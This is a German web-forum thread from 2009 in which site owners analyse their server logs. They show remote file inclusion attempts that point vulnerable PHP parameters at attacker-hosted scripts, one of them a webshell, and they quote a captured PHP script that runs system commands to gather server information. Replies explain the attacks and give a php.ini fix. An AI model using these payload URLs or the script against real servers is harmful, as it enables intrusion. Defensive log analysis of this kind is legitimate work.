#1 16. Mai 2009 Hallo zusammen, folgendes hab' ich gerade geloggt und ich bin mir nicht ganz sicher, wie ich das interpretieren soll: Code: <? echo "ALBANIA<br>"; $alb = @php_uname(); $alb2 = system(uptime); $alb3 = system(id); $alb4 = @getcwd(); $alb5 = getenv("SERVER_SOFTWARE"); $alb6 = phpversion(); $alb7 = $_SERVER['SERVER_NAME']; $alb8 = gethostbyname($SERVER_ADDR); $alb9 = get_current_user(); $os = @PHP_OS; echo "os: $os<br>"; echo "uname -a: $alb<br>"; echo "uptime: $alb2<br>"; echo "id: $alb3<br>"; echo "pwd: $alb4<br>"; echo "user: $alb9<br>"; echo "phpv: $alb6<br>"; echo "SoftWare: $alb5<br>"; echo "ServerName: $alb7<br>"; echo "ServerAddr: $alb8<br>"; echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>"; exit; ?> Code: 1||1242470918||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470920||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470927||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470927||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470928||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470928||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470929||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470929||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470930||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470930||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470930||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470932||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470946||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470946||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470948||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242470948||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805 1||1242477034||77.221.130.19||phpbb_root_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt??||||libwww-perl/5.805 1||1242477034||77.221.130.19||phpbb_root_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt??||||libwww-perl/5.805 1||1242477035||77.221.130.19||phpbb_root_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt??||||libwww-perl/5.805 1||1242477035||77.221.130.19||phpbb_root_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt??||||libwww-perl/5.805 Kann mir da jmd. erklären, was da passiert? + Multi-Zitat Zitieren
#2 16. Mai 2009 AW: Hack-Versuche - Log Auswertung Jemand hat eine Datei (im ersten Fall wars eine webshell, im zweiten Fall die obige PHP-Datei) per RFI geladen und ausgeführt. Im ersten Fall wurde die Variable "openid_rootpath" manipuliert, im zweiten Fall "phpbb_root_path". Das erste Script (cmd2.txt) ist wie gesagt eine Webshell und kann dazu verwendet werden, Befehle auszuführen. Das zweite script (w.txt) liest "nur" Serverinformationen, wie Linux-Kernel version, Server, Serverversion, uptime, username etc. Um die Angriffe unwirksam zu machen, setze die variable allow_url_include in deiner php.ini auf false. Achja, die Angriffe wurden wahrscheinlich von einem automatischen Hackbot ausgeführt (libwww-perl als Useragent). + Multi-Zitat Zitieren
#3 17. Mai 2009 AW: Hack-Versuche - Log Auswertung Pyro alter hast das ja richtig drauf man sieht auch sehr schön das der "hacker^^" seine files auf 2 unterschiedlichen server hostet wobei der eine mit ner joomla cms rennt und er dort auch über ne content lücke rein gekommen is des weiteren nen albaner ^^ ansich wenn noch nix passiert is mach dir keinen kopf die jungs machen fast immer nen hacked by blup um zu zeigen wer den dicksten hat ^^ da das net der fall is pyros rat befolgen und glücklich sein ^^ + Multi-Zitat Zitieren
#4 29. Mai 2009 AW: Hack-Versuche - Log Auswertung wie pyro schon gesagt hat, das ist nix besonders heutzutage und es wart zu 100% ein hackbot, der versucht hat über bekannte sicherheitslücken deine seite zu hacken. wie er dazu kam deine seite zu hacken: google+stichwörter, so funktionieren viele dieser bots... hier mal auszüge aus meinen logs: Code: //sb/index.php?sb_include_path=http://www.kimstroy.by//assets/images/super-id.txt??? Array ( [sb_include_path] => http://www.kimstroy.by//assets/images/super-id.txt??? ) FROM 61.152.160.174 05.05.2009-14:02 /advisories//sb/index.php?sb_include_path=http://onlin3.freehostia.com/glup.txt? Array ( [sb_include_path] => http://onlin3.freehostia.com/glup.txt? ) FROM 80.93.54.77 05.05.2009-14:02 //sb/index.php?sb_include_path=http://onlin3.freehostia.com/glup.txt? Array ( [sb_include_path] => http://onlin3.freehostia.com/glup.txt? ) FROM 80.93.54.77 05.05.2009-14:04 /advisories//sb/index.php?sb_include_path=http://onlin3.freehostia.com/glup.txt? Array ( [sb_include_path] => http://onlin3.freehostia.com/glup.txt? ) FROM 200.32.100.130 05.05.2009-14:04 //sb/index.php?sb_include_path=http://onlin3.freehostia.com/glup.txt? Array ( [sb_include_path] => http://onlin3.freehostia.com/glup.txt? ) FROM 200.32.100.130 05.05.2009-14:05 /sicherheitslucken//sb/index.php?sb_include_path=http://www.kimstroy.by//assets/images/super-id.txt??? Array ( [sb_include_path] => http://www.kimstroy.by//assets/images/super-id.txt??? ) FROM 61.152.160.174 05.05.2009-14:20 /advisories//sb/index.php?sb_include_path=http://onlin3.freehostia.com/glup.txt? Array ( [sb_include_path] => http://onlin3.freehostia.com/glup.txt? ) FROM 203.34.37.16 05.05.2009-14:20 //sb/index.php?sb_include_path=http://onlin3.freehostia.com/glup.txt? Array ( [sb_include_path] => http://onlin3.freehostia.com/glup.txt? ) FROM 203.34.37.16 07.05.2009-14:36 /advisories//sb/index.php?sb_include_path=http://www.syscomm.de/glup.txt? Array ( [sb_include_path] => http://www.syscomm.de/glup.txt? ) FROM 200.32.100.130 07.05.2009-14:36 //sb/index.php?sb_include_path=http://www.syscomm.de/glup.txt? Array ( [sb_include_path] => http://www.syscomm.de/glup.txt? ) FROM 200.32.100.130 07.05.2009-14:39 /advisories//sb/index.php?sb_include_path=http://www.syscomm.de/glup.txt? Array ( [sb_include_path] => http://www.syscomm.de/glup.txt? ) FROM 200.32.100.130 07.05.2009-14:39 //sb/index.php?sb_include_path=http://www.syscomm.de/glup.txt? Array ( [sb_include_path] => http://www.syscomm.de/glup.txt? ) FROM 200.32.100.130 08.05.2009-01:02 /advisories//sb/index.php?sb_include_path=http://www.computerlogistik-herrlinger.de/dreamteam/images/glup.txt? Array ( [sb_include_path] => http://www.computerlogistik-herrlinger.de/dreamteam/images/glup.txt? ) FROM 200.32.100.130 08.05.2009-01:02 //sb/index.php?sb_include_path=http://www.computerlogistik-herrlinger.de/dreamteam/images/glup.txt? Array ( [sb_include_path] => http://www.computerlogistik-herrlinger.de/dreamteam/images/glup.txt? ) FROM 200.32.100.130 08.05.2009-01:07 /advisories//sb/index.php?sb_include_path=http://www.computerlogistik-herrlinger.de/dreamteam/images/glup.txt? Array ( [sb_include_path] => http://www.computerlogistik-herrlinger.de/dreamteam/images/glup.txt? ) FROM 203.34.37.16 08.05.2009-01:07 //sb/index.php?sb_include_path=http://www.computerlogistik-herrlinger.de/dreamteam/images/glup.txt? Array ( [sb_include_path] => http://www.computerlogistik-herrlinger.de/dreamteam/images/glup.txt? ) FROM 203.34.37.16 08.05.2009-23:36 /advisories/errors.php?error=http://www.ambient-arts.co.uk/us/id.txt??? Array ( [error] => http://www.ambient-arts.co.uk/us/id.txt??? ) FROM 93.187.232.189 08.05.2009-23:36 /errors.php?error=http://www.ambient-arts.co.uk/us/id.txt??? Array ( [error] => http://www.ambient-arts.co.uk/us/id.txt??? ) FROM 93.187.232.189 08.05.2009-23:36 /advisories/errors.php?error=http://www.ambient-arts.co.uk/us/id.txt??? Array ( [error] => http://www.ambient-arts.co.uk/us/id.txt??? ) FROM 93.187.232.189 08.05.2009-23:36 /errors.php?error=http://www.ambient-arts.co.uk/us/id.txt??? Array ( [error] => http://www.ambient-arts.co.uk/us/id.txt??? ) FROM 93.187.232.189 09.05.2009-07:07 /advisories/errors.php?error=http://www.instaforms.net//components/Roseid.txt? Array ( [error] => http://www.instaforms.net//components/Roseid.txt? ) FROM 69.94.30.156 09.05.2009-07:07 /errors.php?error=http://www.instaforms.net//components/Roseid.txt? Array ( [error] => http://www.instaforms.net//components/Roseid.txt? ) FROM 69.94.30.156 09.05.2009-07:08 /advisories/errors.php?error=http://www.instaforms.net//components/Roseid.txt? Array ( [error] => http://www.instaforms.net//components/Roseid.txt? ) FROM 74.205.123.49 09.05.2009-07:08 /errors.php?error=http://www.instaforms.net//components/Roseid.txt? Array ( [error] => http://www.instaforms.net//components/Roseid.txt? ) FROM 74.205.123.49 09.05.2009-07:09 /advisories/errors.php?error=http://www.instaforms.net//components/Roseid.txt? Array ( [error] => http://www.instaforms.net//components/Roseid.txt? ) FROM 89.248.106.226 09.05.2009-07:09 /errors.php?error=http://www.instaforms.net//components/Roseid.txt? Array ( [error] => http://www.instaforms.net//components/Roseid.txt? ) FROM 89.248.106.226 09.05.2009-07:30 /advisories/errors.php?error=http://www.instaforms.net//components/Roseid.txt? Array ( [error] => http://www.instaforms.net//components/Roseid.txt? ) FROM 62.178.197.14 09.05.2009-07:30 /errors.php?error=http://www.instaforms.net//components/Roseid.txt? Array ( [error] => http://www.instaforms.net//components/Roseid.txt? ) FROM 62.178.197.14 09.05.2009-20:02 /advisories/errors.php?error=http://aaaa2.altervista.org/id.txt? Array ( [error] => http://aaaa2.altervista.org/id.txt? ) FROM 210.188.218.41 09.05.2009-20:02 /errors.php?error=http://aaaa2.altervista.org/id.txt? Array ( [error] => http://aaaa2.altervista.org/id.txt? ) FROM 210.188.218.41 09.05.2009-20:08 /advisories/errors.php?error=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? Array ( [error] => http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? ) FROM 110.45.144.106 09.05.2009-20:08 /errors.php?error=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? Array ( [error] => http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? ) FROM 110.45.144.106 09.05.2009-20:19 /advisories/errors.php?error=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? Array ( [error] => http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? ) FROM 110.45.144.106 09.05.2009-20:19 /errors.php?error=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? Array ( [error] => http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? ) FROM 110.45.144.106 09.05.2009-20:20 /advisories/errors.php?error=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? Array ( [error] => http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? ) FROM 110.45.144.106 09.05.2009-20:20 /errors.php?error=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? Array ( [error] => http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? ) FROM 110.45.144.106 09.05.2009-20:20 /advisories/errors.php?error=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? Array ( [error] => http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? ) FROM 110.45.144.106 09.05.2009-20:20 /errors.php?error=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? Array ( [error] => http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? ) FROM 110.45.144.106 13.05.2009-15:19 /tag/?path=http://www.ionthenet.co.kr/note_log/ec.txt? Array ( [path] => http://www.ionthenet.co.kr/note_log/ec.txt? ) FROM 210.114.222.32 13.05.2009-15:19 /?path=http://www.ionthenet.co.kr/note_log/ec.txt? Array ( [path] => http://www.ionthenet.co.kr/note_log/ec.txt? ) FROM 210.114.222.32 18.05.2009-11:47 /advisories/errors.php?error=http://www.ambient-arts.co.uk/media/id.txt??? Array ( [error] => http://www.ambient-arts.co.uk/media/id.txt??? ) FROM 85.214.24.22 18.05.2009-11:47 /errors.php?error=http://www.ambient-arts.co.uk/media/id.txt??? Array ( [error] => http://www.ambient-arts.co.uk/media/id.txt??? ) FROM 85.214.24.22 18.05.2009-11:48 /advisories/popup.php?path=http://www.ambient-arts.co.uk/media/id.txt??? Array ( [path] => http://www.ambient-arts.co.uk/media/id.txt??? ) FROM 85.214.24.22 18.05.2009-11:48 /popup.php?path=http://www.ambient-arts.co.uk/media/id.txt??? Array ( [path] => http://www.ambient-arts.co.uk/media/id.txt??? ) FROM 85.214.24.22 23.05.2009-13:17 /advisories/errors.php?error=http://aaaaaaaa2.altervista.org/id.txt? Array ( [error] => http://aaaaaaaa2.altervista.org/id.txt? ) FROM 212.158.163.65 23.05.2009-13:17 /errors.php?error=http://aaaaaaaa2.altervista.org/id.txt? Array ( [error] => http://aaaaaaaa2.altervista.org/id.txt? ) FROM 212.158.163.65 24.05.2009-12:03 /advisories/errors.php?error=http://www.graal-plus.zp.ua//images/super-id.txt??? Array ( [error] => http://www.graal-plus.zp.ua//images/super-id.txt??? ) FROM 91.121.137.51 24.05.2009-12:03 /errors.php?error=http://www.graal-plus.zp.ua//images/super-id.txt??? Array ( [error] => http://www.graal-plus.zp.ua//images/super-id.txt??? ) FROM 91.121.137.51 24.05.2009-12:18 /sicherheitslucken/errors.php?error=http://www.graal-plus.zp.ua//images/super-id.txt??? Array ( [error] => http://www.graal-plus.zp.ua//images/super-id.txt??? ) FROM 91.121.137.51 25.05.2009-18:37 /advisories/blank.php?path=http://www.cookieez.com/image.jpg?? Array ( [path] => http://www.cookieez.com/image.jpg?? ) FROM 89.107.184.60 25.05.2009-18:37 /blank.php?path=http://www.cookieez.com/image.jpg?? Array ( [path] => http://www.cookieez.com/image.jpg?? ) FROM 89.107.184.60 25.05.2009-18:42 /advisories/blank.php?path=http://www.cookieez.com/image.jpg?? Array ( [path] => http://www.cookieez.com/image.jpg?? ) FROM 89.107.184.60 25.05.2009-18:42 /blank.php?path=http://www.cookieez.com/image.jpg?? Array ( [path] => http://www.cookieez.com/image.jpg?? ) FROM 89.107.184.60 25.05.2009-18:56 /sicherheitslucken/blank.php?path=http://www.cookieez.com/image.jpg?? Array ( [path] => http://www.cookieez.com/image.jpg?? ) FROM 89.107.184.60 25.05.2009-18:58 /sicherheitslucken/blank.php?path=http://www.cookieez.com/image.jpg?? Array ( [path] => http://www.cookieez.com/image.jpg?? ) FROM 89.107.184.60 29.05.2009-16:27 /advisories/popup.php?path=http://www.ambient-arts.co.uk/modules/id.txt??? Array ( [path] => http://www.ambient-arts.co.uk/modules/id.txt??? ) FROM 82.146.39.200 29.05.2009-16:27 /popup.php?path=http://www.ambient-arts.co.uk/modules/id.txt??? Array ( [path] => http://www.ambient-arts.co.uk/modules/id.txt??? ) FROM 82.146.39.200 29.05.2009-16:28 /advisories/popup.php?path=http://www.ambient-arts.co.uk/modules/id.txt??? Array ( [path] => http://www.ambient-arts.co.uk/modules/id.txt??? ) FROM 82.146.39.200 29.05.2009-16:28 /popup.php?path=http://www.ambient-arts.co.uk/modules/id.txt??? Array ( [path] => http://www.ambient-arts.co.uk/modules/id.txt??? ) FROM 82.146.39.200 PS: die Dateien, die da teilweise angegriffen werden, existieren auf meinem server gar nicht + Multi-Zitat Zitieren